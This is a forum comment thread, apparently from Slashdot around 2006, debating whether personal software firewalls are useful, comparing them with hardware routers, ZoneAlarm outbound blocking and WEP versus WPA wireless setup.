Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things.

I disagree. Software firewalls on Windows attempt (and usually fail) to add granularity of control for end users.

For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

This depends a whole lot upon your definition of "trusted." In any case, this is just another example of tools being designed without taking users into account. For most users the point of a computer is to run software they want. They don't know what software is secure and I'd argue no one does as everyone has to trust others. I don't know if Firefox has a backdoor that will be enabled next week. I haven't audited all the code. I doubt you have either. Whether it is Firefox, some shareware, an executable some friend sent via IM, of just something the user thought was data but the extension was hidden on, users who don't run untrusted data are missing a huge portion of the functionality they want from their computer. More important yet, they expect that functionality. It is not that they are stupid, they just have reasonable expectations that are not being met.

For example, most users never want any programs except their e-mail client to be able to read their e-mail address book. I mean what kind of stupid machine would let "nekkid_pics.jpg(.exe)" read my friends e-mail addresses and send a whole bunch of e-mail to them without asking me first? Who wants their computer to do that? And yet, almost all modern OS's just let any old program or program disguised as data to absolutely anything they want without asking the user or even informing them. That is what is stupid.

Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

If I drive poorly, a bunch of kids could get run down and killed by a ton of metal. If I run random executables someone might get spam e-mail. Perhaps you see how the negative consequences of the former warrant licensing while the latter almost certainly does not?

The real problems are twofold. One, computers are very poorly designed and don't behave as users expect. Two, when computers don't meet people's fairly reasonable expectations and instead are hijacked by spammers, people like you blame the users instead of the crappy OS's. Fix the software first, then if the problem persists you can blame the users.

Re:Question

[laray88]

I am not that much concerend with what is comming in. I have a router/firewall for that. I like to know what is going out and to where, and for that a PFW is valuable.

Re:Question

[atokata]

Because driver's licenses have been so effective in not allowing stupid people to injure others using their cars? And, because federal regulations *always* fix problems? ;-)

Re:Question

Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

I'm sorry, but am I the only person who disagrees with this opinion? There are different kinds of computer users, and most people don't want to have to learn all about networking, security, firewalls etc. Yes, there are some that do, but we are not a majority. Wouldn't it be nice if the OS didn't need a million and one security applications running all the time to stop it doing what it shouldn't be able to do anyway?

Besides, the computer ignorant act as easy pickings for crackers, malware, viruses etc. so that they don't try and work out how to break into computers that are "secured" by the more techno-savvy, acting as a handy meat-shield. If a "computing license" was required then the crackers would be forced to actually become hackers rather than the current batches of script-kiddies. Computer ignorant users give us computer ignorant crackers. Is that such a bad thing?

Re:Question

[Alarash]

I would suggest one of the SOHO product of Fortinet. They are firewall/IPS/IDS. That is, not only do they provide the basic routing and firewall protection (NAT, (D)DoS protection, etc..), but will also scan inbound and outbound traffic for virus, malware, spyware and spam. The dangerous data is blocked before it reaches your computer, and that is good.

Re:Question

[Cutting_Crew]

i have McAfee Personal Firewall and Viruscan for my software firewall. i also have a Linksys hardware firewall so i can have wireless network. The McAfee software firewall and virusscan are set to update automatically and i have the firewall alert me when applications and other software is attempting to access the internet to and from my computer. I have it set up to give me an option as to whether i want to grant access only once or forever and whether i want to limit the access to just inbound or outbound or both.

I have the linksys router that is my hardware firewall that i have set up as secured. that is the person trying to connect to it has to have the 10 digit key but also their MAC address has to be listed in allowable computers to have access to the net. The other night i got a warning that a computer with MAC address "whatever" was trying to access the network and should i allow it. Obviously i clicked "NO" but I dont know if someone somehow got the 10 digit key or i dont know how this works. what would cause this prompt? does someone have to have the key before it checks the MAC address?

Anyway this is my setup so tell me if this is enough? thanks!

Re:Question

[evil_Tak]

A trained monkey could pass a driver's test in 2006.
I passed one on the highway this morning.
He was actually doing better than most of the other drivers, as he wasn't applying mascara, talking on the phone, and smoking.

Re:Question

[thePowerOfGrayskull]

I am not 100% sure, but I believe that they will need to have cracked the key before checking WAN -- because to crack the key, they need only to 'eavesdrop' on the frequency, and not make any active connection to it.

Allowing only authorized MACs to connect is great, though not perfect because these can be spoofed. Having your wireless router using a key is a good idea, but you'll want to use WPA-PSK for encryption instead of WEP. A quick google search gave me this article which -- in spite of the source -- actually does an OK job of explaining. If you're running Windows, and your card & router support it, the article will be sufficient to get that set up.

WPA-PSK can be tricky to set up on linux, if you're running any linux workstations wirelessly; they only way I've been able to do it with my Broadcomm card is via ndiswrapper and wpa_supplicant. If you're using a wireless linux desktop, some research will be required to find out how to configure this for your distro.

Re:Question

[evil_Tak]

I don't know if Firefox has a backdoor that will be enabled next week. I haven't audited all the code. I doubt you have either.

No, I haven't. Fortunately for us, there are thousands of people auditing the code at any given moment.
I have audited the Gaim code, however. I can assure you that there is no backdoor.

Re:Question

[99BottlesOfBeerInMyF]

No, I haven't. Fortunately for us, there are thousands of people auditing the code at any given moment.

And I can trust that all of them will look at the relevant code and are competent and honest?

I have audited the Gaim code, however. I can assure you that there is no backdoor.

I see. evil_Tak says it is good, so I should trust it eh? None of us know all the code we are running is trustable and will continue to be so as we update it. We all want to run code in which we have differing levels of trust. Not recognizing that in OS design is a problem.

Re:Question

[joto]

Because driver's licenses have been so effective in not allowing stupid people to injure others using their cars?

Well, yes. I think you'd find it pretty hard to argue otherwise.

And, because federal regulations *always* fix problems? ;-)

Well, not always. But usually. And that should be enough incentive to be in favour of laws. If something must always work better for you to consider it, there isn't a single invention good enough for you to use. So you'd better start running around naked in the woods, or realize that worst case scenario is not a good metric for everyday life...

However, I will agree that in this particular case, regulation is probably not a good idea. Demanding that computer users need a "license" to use their computers, makes about as much sense as demanding that hammer users need a "license" to use a hammer (for most people, the hammer is even more dangerous). Unless we are willing to punish people for mismanaging their computers (e.g. getting "owned" becomes a punishable offence), demanding that they have a license makes little sense.

Re:Question

[Malc]

Not just wireless networks. If you VPN to your office, then you a software firewall might help there. Our corporate LAN used to be badly infested to the point we had to bring up new machines behind a consumer-grade router (Linksys unit) just so that we could download and install the latest Microsoft patches without being infected.

Re:Question

[99BottlesOfBeerInMyF]

It takes ONE guy to find a malicious backdoor in an OSS program and the backdoor will be fixed and the responsible lynched.

Yeah because servers and dev machines are never compromised and because user accounts are never hijacked. It has happened before and will probably happen again.

Under NDA's and similar stuff point to me one guy who'll risk his head exposing such a thing in a commersial firewall.

Umm, this is an argument in favor of my point, not against it. We need to be able to run code we don't trust without a huge hassle and without giving it complete access to do anything it wants on our machines.

Re:Question

[evil_Tak]

If the project is good enough for you to want to use, I'd say you're confirming that its developers are competent. With respect to honesty, it only takes one honest auditor to flush out any wrongdoing, but it takes 100% dishonest auditors to cover it up.

I have the luxury of not running any code I don't trust. I sympathize that you don't have this luxury.

Re:Question

[99BottlesOfBeerInMyF]

If the project is good enough for you to want to use, I'd say you're confirming that its developers are competent.

I usually try before I buy. It just means I want to run it, perhaps to evaluate, perhaps because I need to open those files in a weird format, perhaps because I think it's the greatest thing ever.

With respect to honesty, it only takes one honest auditor to flush out any wrongdoing, but it takes 100% dishonest auditors to cover it up.

Much code is never audited and much software is only available as closed source binaries. Who is to say an auditor will recognize a backdoor even if they see it.

I have the luxury of not running any code I don't trust. I sympathize that you don't have this luxury.

I can cope. I have VMs and IDS software. I'm fairly competent.

Many users, however, often don't even realize that they are running code at all. They think they're opening a picture or a movie. They just want to play a game. Look at the most popular software packages on Windows. How many of them do you trust to not phone home, or overwrite something? Most users who get a foo.exe in their mailbox think, "hmm, I should run this martian blasting game that speeds up my internet." The OS should let them double click on any old thing without automatically trusting their entire machine and all personal data on it to the author of each of these binaries.

Re:Question

[Cutting_Crew]

i just looked on my router settings, i have a linksys and WAP-PSK isnt an option. WPA and WPA personal & Enterprise are some of the other options.. i am not sure if this is better than WEP or not. any suggestions?

Re:Question

Oh boy, if you are counting on your nforce4 motherboard to protect you, you are already a zombie.

Re:Question

[SanityInAnarchy]

Source? Is there some specific vulnerability I should be concerned about?

But no, I don't count on that. I also count on common sense.

Re:Question

[thePowerOfGrayskull]

Damn. I had a whole thing written up, then I closed the wrong window. Quick answer: I believe that on a consumer device like that router, WPA implies WPA-PSK. If you have the option of entering a password on the router -- after you've selected WPA -- then it's WPA-PSK. (PSK is "preshared key"; the password is that key, stored on the router and on anything connecting to it.)

Just make sure not to use a dictionary word, and the longer your phrase is the better (over 8 characters max of 64. using > 8 makes sure it will get converted to a hash IIRC). You'll also want to change it regularly (maybe 1 time a month or so).

Re:Question

[evil_Tak]

Some OSs do that. ;-)

Re:Question

[99BottlesOfBeerInMyF]

Yeah, to some degree. SELinux is the closest I've seen to a usable desktop/workstation, but the defaults for it need to be seriously customized. I really hope someone builds the UI componenets necessary to bring this to the masses, but I'm sure not counting on Microsoft to do it.

Re:Question

[Cutting_Crew]

ok should i choose WPA Personal/Enterprise or WPA2 Personal Enterprise?
Also it does ask for a "Passphrase" but then also allows me to assign 10 digit keys. should i use this in addition to a passphrase? do i need a passphrase? what is MAXIMUM protection? thanks grayskull!

Re:Question

[Cutting_Crew]

EDIT Grayskull: when i click on WPA Personal it asks for 2 different algorithms. TKIP and AES. then a WPA Shared Key Text box(whats this?) and a time in seconds gor Key Group Renewal. Default is 3600. WAP enterprise asked for Radius server address and Radius port etc but neither offer a passphrase like WEP does.
maybe i should stick with WEP and have a passphrase + 10 digit key + Mac Address Filter?

Re:Question

[thePowerOfGrayskull]

Unfortunately, you've passed byeond the limit of what I'm familiar with. Offhand, it sounds like you probably want WPA Personal, choose TKIP, and the "WPA Shared Key" is the "PSK" part of it -- that's the passphrase you need to enter on the device, and in Windows in order to connect to your network.

If at all an option, I would definitely say do NOT stick with WEP -- a quick search shows many, many howtos and tools available for breaing that encryption quickly and easily. Mac address filter is definitely good to have regardless, but it won't stop people from 'eavesdropping' on your data if they break encryption.

Re:Question

[Cutting_Crew]

what do you mean by eavesdropping? no one is allowed to look at any of my folders. that option is unavailable.

Re:Question

[thePowerOfGrayskull]

Using their wireless equipment to scan what's being sent over yours. Once they have determined you key, they can do that without joining your network -- so MAC blocking won't prevent. Basically provides a wide-open door to anyone snooping your network.

Re:Question

[Cutting_Crew]

ok then..so whats the 100% way to keep people out or is this unavoidable? and i am assuming it would take someone at least somewhat hacker-knowledglable to be able to do what you just described? more talk about this and we might need to exchange IM's :)

Re:Question

[Cutting_Crew]

ok then..so whats the 100% way to keep people out or is this unavoidable? and i am assuming it would take someone at least somewhat hacker-knowledglable to be able to do what you just described? more talk about this and we might need to exchange IM's :)

I guess i am confused. if you need a Key + your computer has a MAC address then yeah they can spoof the key all day long but if there computer MAC address isnt allowed in my list in my router settings then how could they get through?

Re:Question

[thePowerOfGrayskull]

Like I said before, use the WPA option. That's the best one, since it changes its encryption algorithm dynamically, making it much harder to break. Changing the passkey every month or so should make it reasonably safe.

There are two reasons that approved MAC addresses by themselves aren't sufficient. First, a MAC address can also be easily spoofed. So if someone is monitoring traffic, they pick up your valid MAC address, then use it themselves. (I'm oversimplifying a little, but htat's the basic scenario.) Second, while it may help deter someone from actively using your connection, it won't do anything to prevent monitoring of traffic going across your wireless network -- so sensitive or personal information could be picked up. Again, this is less likely a concern, but it is possible.

Which Six?

[140Mandak262Jamuna]

Could not find the list of the six software tested. Dont know if Zone Alarm was tested and found to be defective too. But I would be surprised. Everytime I update FireFox, Zone Alarm knows that the exe file has changed and alerts me to renew permission for it to connect to the internet.

Re:Which Six?

[dvice_null]

One of the most common problem I see in Firefox help forums is related to a firewall blocking Firefox after update. Sometimes the problem is that firewall didn't even ask for a new permission nor tell the user that software was blocked. And sometimes it could be an user who presses wrong button, without understanding what it means.

Re:Which Six?

[Sigg3.net]

Remove the wrong button, problem solved.

Useful in their own right

FTFA: Users who still prefer a firewall should first check whether they are using a router with firewall functionality. If so, then no firewall is needed, including the one build in to Windows XP, reports PC Professionell. As far as I'm concerned, the main purpose of using personal firewalls is to prevent unwanted outbound connections, for example from Microsoft products. Hardware routers only block incoming traffic, and can't do it on a per-program basis. The article is too quick to dismiss personal firewalls for not being every man's savior.

Re:Useful in their own right

[rs232]

"Hardware routers only block incoming traffic"

I don't see why not, a firewall is a customized router with rules that block by source address/port. If you don't want people surfing block outgoing on port 80. Of course it's going to difficuly figuring out what is or is not legitimate traffic coming out of a Windows box as it has to open numerous high ports in order to function.

"Suppose I submit a firewall for testing that consists of a screening router with a default set of rules that block all traffic except outgoing WWW?"

"and can't do it on a per-program basis"

What you are refering to is an application-level firewall. Software or personal firewalls are no subsitute for embedded standalone solutions as when the users personal system is compromised, all bets are off.

well, duh

But that's not why I use a personal firewall. I use a personal firewall to prevent "non-malicious" software from phoning home, running automatic updates, checking licenses and all that other crap which might inconvenience me if it happens at the wrong point in time. To keep nasties out I have a hardware firewall.

Common Sense?

[kingsean]

I always get questions, especially from my college friends, about what AntiVirus software and Firewall I use on my Windows machines. And to be honest, it stuns me to see them stunned when I tell them I use neither. This BSI Agency pretty much summed it up in the middle of the article:

"Desktop firewalls, as they are also called, are practically extraneous, presuming that you adhere to the basic rules of safe surfing," ... "Surfing habits are hence important for security,"

Granted, "safe surfing" changes from household to household, but people who are using the internet should at the very least have the slightest idea on what they should be clicking on. All of the browsers today come defaulted to spit out warnings whenever someone is clicking on, say, an EXE file. Of the general users I've seen surfing, these warnings are normally defaulted to the 'x' button which is entirely "unsafe surfing."

I do, however, have my router set up to block outgoing traffic to certain domains as well as connection types that I know my family will never use. Upon request, I go out to friend's and neighbor's houses to set that kind of stuff up for them, because having to walk them through it would be hell, much less trying to explain what I was doing. Firewalls and AntiVirus software aren't exactly very user-friendly; people would rather install them and expect them to work rather than read through heavy material and configure them to fit what they need.

Re:Common Sense?

[justthinkit]

Ok, you are the unofficial Slashdot Pied Piper of 2006 for not using an A/V or firewall but before we all rush off the cliff with you, perhaps you can explain how you determine that the file you _want_ to download is not infected with something you don't want? Yes, you have outbound stuff covered with your router but you make no mention of any inbound filtering other than your apparently perfect intuition.

[Those cursed with less than perfect cranium/ESP combinations [or children] should continue to use AVG anti-virus or equivalent, along with XP's free firewall.]

Re:Common Sense?

A few things no-one seems to have mentioned yet:
Vista will apparently include "2-way" firewalling. As "good??" as existing XP 1-way. Hmm...
Well MS are MS right ?
More importantly. On external routers most people seem to be making the assumption that the external router via NAT is a secure box. There are well known vulnerabilities for several "home-based" routers. You can't treat them as "black-boxes" and forget about em'.
They run software - right ?
In a basic config relying on an external router and turning off firewalling (of whatever variety) on internal boxes is just plain asking for trouble !

Re:Common Sense?

[kingsean]

Not once, anywhere in my comment did I say that I had perfect intuition, nor did I say that a system with no AntiVirus and Firewall is the perfect setup for all the computer mice of the world. It also might be worth mentioning that I am very rarely on a Windows desktop.

Perhaps, though, I was a bit misleading and for that I should apologize. I merely meant to comment that software based Firewalls are ridiculously overhyped as mentioned in the article and a common solution to an oversecure system is merely to watch what you download... plain and simple. Firewalls should be left for the hardware to work with or a computer that is solely dedicated to that function.

But since you seem to take this personally, if it makes you feel any better my old man's laptop uses Panda and the general family computer runs Norton.

Sean

No kidding... I've found them useless in practice

[RebornData]

The issue with most desktop software firewalls that attempt to control outbound connections is that they have no idea in advance what constitutes a valid program and what doesn't. So they ask the user, who in most cases is unable to answer the question. The only information typically provided is the executable name, and in many cases it's a generic one (like svchost.exe) that leaves even an experienced user without the ability to make an informed decision.

The problem is that this trains users to ignore the prompts and habitually click "allow" or "deny" (usually because they find out the hard way that stuff breaks when they click "deny"). The result is far worse than if there were no attempts to control outbound access, because most of these firewalls (Zonealarm in particular) use similar techniques for *inbound* traffic too... they will prompt the user when a program opens a listening port, and if they hit "allow" will enable global inbound traffic to that port, creating a hole that otherwise wouldn't have been there.

This happens regularly in practice- I've seen it over and over again with my small business consulting clients. Although technically an outbound software firewall with program control could be a good last-ditch effort to block malware that has managed to get installed and running, on a practical basis they cause more problems than they solve.

-R

Link to "printable" version of stories!

Use the "printable" version of stories when it's available! That link from the slashdot summary made my eyes burn because I didn't have that site adblocked.

FYI: http://www.mg.co.za/printPage.aspx?area=/insight/i nsight_tech/&articleId=275381

It's not that difficult to do!

Duh

[The+MAZZTer]

Once malware is running on your PC you should assume it can do ANYTHING it wants, including disabing firewalls/antivirus, etc.

Heck, Windows Firewall has an API to allow programs to add themselves as exceptions (probably because if it didn't programmers would just use 100 different non-forward compatible methods to do it).

How about configuring the software first?

[brunokummel]

I haven't found on TFA , but then again i read it on a rush because my boss was in the room, but i guess they performed the test the way most regular users use a personal firewall.
This means press install, press next, next, next,next, OK and done I have my own personal protection!
If you take the time to tune the software firewall, i'm pretty sure you would have much better results.

It lasted a whole 10 minutes?

[Moraelin]

I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.

Basically the story is that I had managed to fry my home machine, didn't have a second computer at the time, but hey, looks like I got enough older parts for one (or a couple of them.) Stupidly enough, the firewall program (Sygate was my favourite at the time) was among the few things I had never backed up, but otherwise I could have a computer to play with in an hour or so.

Now I could have, of course, went and bought some security program, or could have downloaded it at work and burned it on a CD, or whatever. I chose to just do a sacrificial install instead. As in, you know, install Windows, go online unprotected long enough to download a firewall, reformat, reinstall Windows. I fully expected the first install to get virused, but that's ok, since it would get reformatted a few minutes later.

It also was Windows 2000, not XP, so no activation hassle.

Well... let's just say that what I didn't expect was how fast the thing got virused. I expected it to get virused eventually, yes, but it got owned within a couple of minutes. Scary.

Re:It lasted a whole 10 minutes?

[julesh]

I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.

You were probably unlucky. In the days before MSBLAST, a friend of mine was running his laptop unknowingly without a firewall, connecting to the internet daily. On the day MSBLAST was released, he got it. Realising his mistake, he brought the laptop to me, so I could perform a forensic inspection: MSBLAST was the *only* thing on the machine that shouldn't have been.

Of course there are a few more nasties out there today, but I wouldn't be surprised to hear that a WinXP SP2 machine with no additional patches could survive for a few days at least.

Old article

[keithchau]

Hey, the article was oooold, dated back in "25 June 2006". If it were some great discovery, we should probably have come across it much sooner.

And spam filters are not 100% effective...

[jbarr]

...and anti-virus scanners are not 100% effective. Given the continual cat-and-mouse game played by the white hats and the black hats, short of removing a PC completely from a network, there's little to completely, 100% guarantee security.

That said, many of the software personal firewalls ARE actually quite good. The people using them just need to understand the potential ramifications. Education of basic Internet security combined with good Web browsing and file handling practices can go a whole lot farther than blindly relying on a single product.

-Jim Barr
http://jimstips.com/

Software Vs. Hardware

[Drakin020]

I think the problem here is Software vs. Hardware firewalls.

Compair a Cisco PIX 501 to Nortons latest and greatest software firewall
Software firewall basically starts off blocking what it thinks are potential viruses or threats to your computer.
A hardware firewall such as a PIX 501 just blocks everything until you tell it otherwise.
A software firewall basically is a nusence with all its little security warnings "CAUTION Your getting on the internet"
Hardware firewall just stays out of the way and does only what its told to do.

The biggest of them both is the fact that software is so much easier to bypass than that of a Hardware firewall. Software only blocks what comes into your computer where as the hardware is there right when traffic passes your modem.

Also you get what you pay for...a PIX 501 runs around 400-500 where as norton with ANti-Virus is what...50 bucks? You basically get what you pay for and cant expect much more.

Re:Software Vs. Hardware

It's been a bit, but I thought the PIX 501 by default lets all out, denies all in. But also you can configure until your hearts content and monitor it if you want. Also it has protocol inspection in the fixup commands. Unfriendly apps trying to use default open ports doesn't work with the PIX, the SMTP fixup opens port 25, but checks the commands running through it and gives fake respsonses to anything other than basic SMTP commands.

Yes, you get what you pay for.
 
I have absolutely no desire to even see one of these desktop firewalls ever again, the resources drained from your PC to provide the minimal protection isn't worth it to me. Great for my mom though. But if I want to prevent apps from launching, Windows has a built in policy editor that allows you to configure policies that have obvious names like "only run allowed apps", way better than trying to get a 3rd party app to do the same thing you can already do in windows for free. plus, for all the windows users with default settings out there, if you take 5 minutes to create a user and not admin account, than use that to browse the web, than malicious software can't be installed even if you wanted to unless it's an actual security hole in the software, it's a hell of a lot more simple to do than keep configuring app inspection in your desktop firewall and provides better security.

ZoneAlarm + broadband router = happiness

[WidescreenFreak]

Even though I'm behind a firewall, I use ZoneAlarm on all of my PCs so that I can catch what's communicating with the Internet and what's not. So far, it's done superbly well as far as I can tell.

For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's fnished! Excuse me? Exactly what is Media Player trying to figure out? Well, whatever it is, it's none of their damned business. Check "Remember this setting", click "Deny", and done.

Every time a process tries to act like a server, ZA also notifies me of that as well. It's a bit of a pain when I fire up a game server for the first time and the pop-up balloon interferes with the screen (whoops), but again it just shows that it's at least doing what it's supposed to do.

ZoneAlarm has its share of issues, but it clearly goes with the attitude of "better safe than sorry". There have been some rare times where the program itself doesn't start, for whatever reason, but its service gets started. On those rare occasions I've noticed that the service, if it can't communicate with the control daemon, or whatever you want to call it, it just blocks all network access. It could have just allowed everything instead and there'd be no way of knowing if it's working or not. Personally, I'd rather have it block all access. Not only does that let me know that there's a problem, but it's certainly keeping the PC's network connection secure.

Using a hardware firewall for inbound and ZA for outbound connections makes perfect sense as far as I'm concerned. It's not trouble-free, but they've been getting better at its stability over the past several revisions from what I can tell.

Re:ZoneAlarm + broadband router = happiness

[squoozer]

Media player is probably either doing some sort of licence check or an ID3 tag look up (or both).

Re:ZoneAlarm + broadband router = happiness

[brunascle]

I agree. ZA may not be totally secure, but it does give me a lot of info about what's going on at that moment; info that i might not know until much later, or i might never know.

for example: after i installed the nVidia drivers for my new card, ZA notified me that Apache was running and trying to accept connections. Apache? Excuse me, Apache? Dont get me wrong, Apache's great, but there's no way in hell i'm letting you install a web server on my PC without my permission. i promtly shut down the service (which was located in a sub-folder of the nVidia folder) and uninstalled the optional ForceWare package, which i believe was the culprit.

Re:ZoneAlarm + broadband router = happiness

[birder]

Well, I agree. Setting up tests in which your system is already comprised seems pointless. Now, ZoneAlarm is only as good as the person using it. I have a router that blocks inbound and use ZoneAlarm for outgoing. It has stopped everything going out that doesn't need. I couldn't imagine running Windows without.

Re:ZoneAlarm + broadband router = happiness

[Tim+C]

For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's fnished! Excuse me? Exactly what is Media Player trying to figure out?

Depending on your settings, it's probably opening a connection to the server to retrieve media info from (on startup) and reporting anonymous* usage data (on shut down). Both of these things can be switched off in the options settings. I don't guarantee that this will stop it phoning home completely, however, as I long since did as you did and blocked it.

Re:ZoneAlarm + broadband router = happiness

[ucblockhead]

For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's fnished!

Most likely: At the start of the song, it's grabbing song metadata from a server, and reporting back that you played the song (probably with the "you" just being a "private" id, not anything user identifiable. (Whether that's truly private is an open question.) When the song finishes, it's probably reporting whether you listened to the complete song or not. They likely do this because play information is valuable for building a recommendation engine, and for selling to the record companies as marketting information.

Most music players do this, but they usually ask permission on install and there's usually a setting to turn it off.

Virtual firewalls on virtual machines

[plankrwf]

Some of the problems with 'virtual firewalls' can be solved through real firewalls on ... virtual machines (i.e. Sieve at http://sievefirewall.sourceforge.net/ or at http://www.vmware.com/vmtn/appliances/directory/24 5)

Software Tested & Results????

Sorry to say that this article was about as useful as a RubberBand Band. Now if they'd identified the tested apps along with version of Windows, I'd be more willing to even consider the article to be informative but no, they make so many claims about personal software firewalls not being effective in some cases. What Cases and what worms/trojans/malware was able to bypass them or what firewalls were able to be bypassed?

Now I was one of the original beta testers for Zone Alarm and while it isn't perfect by any means, it's still about the only useful one I've seen and I continue using it today and recomending it as being fairly effective at what it does. It's at least better then the joke MS includes called Windows Firewall, which doesn't even have any outbound control unlike ZoneAlarm, which is what I mainly use it for and no I'm not a windows user as I'm currently running KDE-3.5.2 on Gentoo with 2.6.17 vanilla-series kernel (default tree), instead it's to ease the load I have in supporting the other computers in the household that still run Windows as yet.

If I want to block all outbound traffic

[Perl-Pusher]

I could always disconnect! That is the #1 problem with personal firewalls. If your computers is making connections you don't want, your problem is not the ability to make a connection. It's the program that is making those connections. If you have a problem with spyware / malware, do us all a favor and disconnect. A firewall is meant to be between your PC and the Internet, not on your PC. Personal firewalls aren't really firewalls, they are more like patches in a pool or tank, an attempt to fix something broken and leaking. Which makes them more personal annoyances than firewall. They should just block incoming SYN traffic trying to initiate a connection only.

The worst offender in my experience is Norton Internet Security. It blocks everything, browser mail, MS Update everything! your just computer locks up for 30 sec - 3 minutes and then the goddamn little symantec pop up appears!

"Warning! Your computer is trying to make a connection to the internet, this is an unsafe act. Please press OK to reboot"

bullshit

I have one holding open my bedroom door (for kitty) and it works great!

[OT] Re:Link to "printable" version of stories!

[Ma�djeurtam]

If slashdot, digg and friends were to link to printable versions, how long would it take for those sites either to remove the print version or to put their ads there?

Re:[OT] Re:Link to "printable" version of stories!

It would benefit us in the meantime to link to printable stories.

Currently, nobody links to them, so we see the pages with ads anyway.

If we link to printable stories now, at least we could have a month or two of easy reading before they go back to putting ads on the printable pages, which would be no different than the stories linked today.

Re:[OT] Re:Link to "printable" version of stories!

[jmarkantes]

They should be doing things right by using a different media ("print") in their CSS. That way they could display ads on the screen, and when people print it's still formatted correctly.

Regular users wouldn't be able to just click the print link to bypass ads, and advanced users could display on screen the print style sheet.

J

Winpooch

[jhfry]

This is why I run winpooch http://winpooch.free.fr/. It's not a firewall, but it does allow me to monitor my outgoing connections, and apply rules to them. For example, I can have it prompt me for every outbound, just announce when an outbound connection is established, or allow all outbound. Same thing with inbound. More complex rule sets are allowed as well.

It's not gonna save me from a worm itself, but it will tell me when I have a worm or rootkit making outbound connections.

And it allows me to use ClamWin to do on access scanning, tells me whenever an application tries to change the registry or system files, and provides a simple method to determine most of the potentially damaging processes running on my machine.

Best of all it's opensource.

A firewall is a *device*

[Curmudgeonlyoldbloke]

And where do you insert this "device" between your PC and the wireless router in the coffee shop or hotel romm in which you're sitting? Wave it around in mid-air or something?

Besides that, the most useful purpose of these things isn't against trojans that someone's running because they're an idiot, it's software such as media players insisting on phoning home (for example, the "Microsoft Windows Media Configuration Utility" connection attempt that occurs when WM9 tries to update itself).

Re:A firewall is a *device*

I tried out the AOL antivirus that slashdot was talking about a few weeks ago. Zone Alarm lit up every fucking time I booted the machine, asking if it was OK for my antivirus to access the internet (well, maybe it was updating its list) then wanting to act as a server!

Why in the hell should an antivirus act as a server?

It was uninstalled pretty quickly. ZoneAlarm did its job. TFA is full of shit.

Re:A firewall is a *device*

[swordfishBob]

The same place my parents would put it. They have an ordinary modem. Same with my in-laws, except they couldn't have Cable or DSL if they wanted it.

Re:A firewall is a *device*

[jez9999]

No, it's against hackers trying to connect to your system and exploit OS holes. My Sygate firewall is CONSTANTLY blocking hundreds of port probes to my IP address. At least, its logs say so. That's why I sort of laugh when I see reports that Microsoft's latest patch to an OS hole introduces an OS hole.

I've probably been owned by a piece of malware or something instead, though.

Bladder control problem too, eh?

Do you have a bladder-control problem, too?

I Agree!

[SFSouthpaw]

Whoever wrote that was a dick!

Marketing

[Dachannien]

The problem isn't that personal firewalls are useless. Rather, they are being marketed for a purpose they are not equipped to perform properly.

I use a personal software firewall on all my Windows machines for two reasons: one, to prevent worms and such from getting a foothold on my machine, and two, to prevent phoning home of "non-malicious" software that has no real reason to be connecting out. I've run a bunch of programs over the years that attempt to connect to some remote machine for some unknown purpose and were subsequently caught by the firewall. None of these programs have been malware per se, but the outward connection is something that I nevertheless wish to prevent. In order to prevent actual malware from connecting outward, I am very careful about what I download and run.

In fact, the only time that I've been nailed with malware in recent history was once when I hadn't installed a personal firewall and I VPN'ed through my hardware NAT router, thus exposing my machine to the full ill-will of teh Intarweb.

security expectations for basic home NAT?

You comment makes me wonder how much measure of security I have in a simple home network setup that consists of the following: (outside-in viewpoint...)

sbc DSL home service (not fixed IP) DSL device old netgear 4port home router with DSL ethernet interface + 4 internal routed ports providing basic NAT services to home net and PPPoe auth to the DSL CO internally, windoze PCs not running any kind of inbound/outbound FW software.

So what's the risk level w/crackers and script kiddies being able to somehow traverse the NAT router setup to access my home net PCs?

Re:security expectations for basic home NAT?

[SuperMog2002]

If you don't have any ports forwarded or DMZ enabled, pretty much nil. You should be good. Now, that setup will grant you no protection whatsoever from a stupid user who winds up with malware, but that's a whole different can of worms.

Weakest Link...

[jhembruff]

A chain is only as strong as its weakest link. That's doubly true when it comes to protecting computers that are connected to the internet.

Yes, and thats generally the thing between the chair and the keyboard, not your firewall. Obviously a personal software firewall can't be perfect, but they do a pretty good job of protecting you from inbound traffic (hell, even the XP SP2 firewall does a decent enough job of this, try connecting an unpatched unfirewalled XP machine directly to the internet and see how long it takes). The best they can do for outbound is provide you with information about it and you can confirm/deny, unfortuneatly most people just click yes to everything. And if a computer has been compromised already and is trying to send outbound info, it was most likely the fault of the person who installed it without knowing what it is.

Also, the article fails to mention which firewalls were tested, or how, but they get on the right track at the end when they talk about malware being at its root a problem that requires a social solution, not just a technological one (though hopefully not having everyday users run as admin 24/7 in vista will help, if only slightly).

Personal firewalls quite useful

[MobyDisk]

There are ways around personal firewalls, therefore personal firewalls are useless.

So says an article linked by an article linked by an article that I can't really read. Pardon me if I am not convinced.

I'm quite content with the personal firewall I have. It stops lots of outbound connections from applications that like to phone home. If there is an app on my system that searches for IE windows and uses them to surrepticiously send data out -- I'm already f*d. Fortunately, my firewall blocks IE so I'm not vulnerable to that one. (It could use Firefox though).

All of them?

[Penguinisto]

...guess they didn't test iptables or ipfilter (shrug).

/P

Re:All of them?

[Deoxyribose]

What differences are there inthe effectiveness of ipfilter/iptables-based Linux firewalls as compared to Windows software firewalls (i.e. Zonealarm et al). If anyone has anything illuminating on this topic I would be interested to hear it. I've been using Firestarter for awhile now on my Ubuntu box, and have been wondering if I'm missing out on some of the more sophisticated or subtle features of iptables.

Re:All of them?

[Penguinisto]

